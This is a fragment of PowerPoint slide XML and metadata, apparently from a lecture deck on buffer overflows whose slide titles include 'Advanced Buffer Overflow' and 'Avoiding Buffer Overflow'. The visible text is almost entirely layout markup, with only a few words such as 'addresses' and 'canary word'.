              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37894" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5867400" y="6308725"/>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37895" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5867400" y="5851525"/>
            <a:ext cx="2209800" cy="4572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37896" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5867400" y="4022725"/>
            <a:ext cx="2209800" cy="13716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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37897" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5867400" y="5394325"/>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canary word</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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4194</TotalTime>
  <Words>1773</Words>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>269</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新細明體</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>mystyle</vt:lpstr>
      <vt:lpstr>Buffer Overflow (Part II)</vt:lpstr>
      <vt:lpstr>Advanced Buffer Overflow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Avoiding Buffer Overflow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2001-10-16T08:18:06Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-01-17T08:10:48Z</dcterms:modified>
</cp:coreProperties>
</file>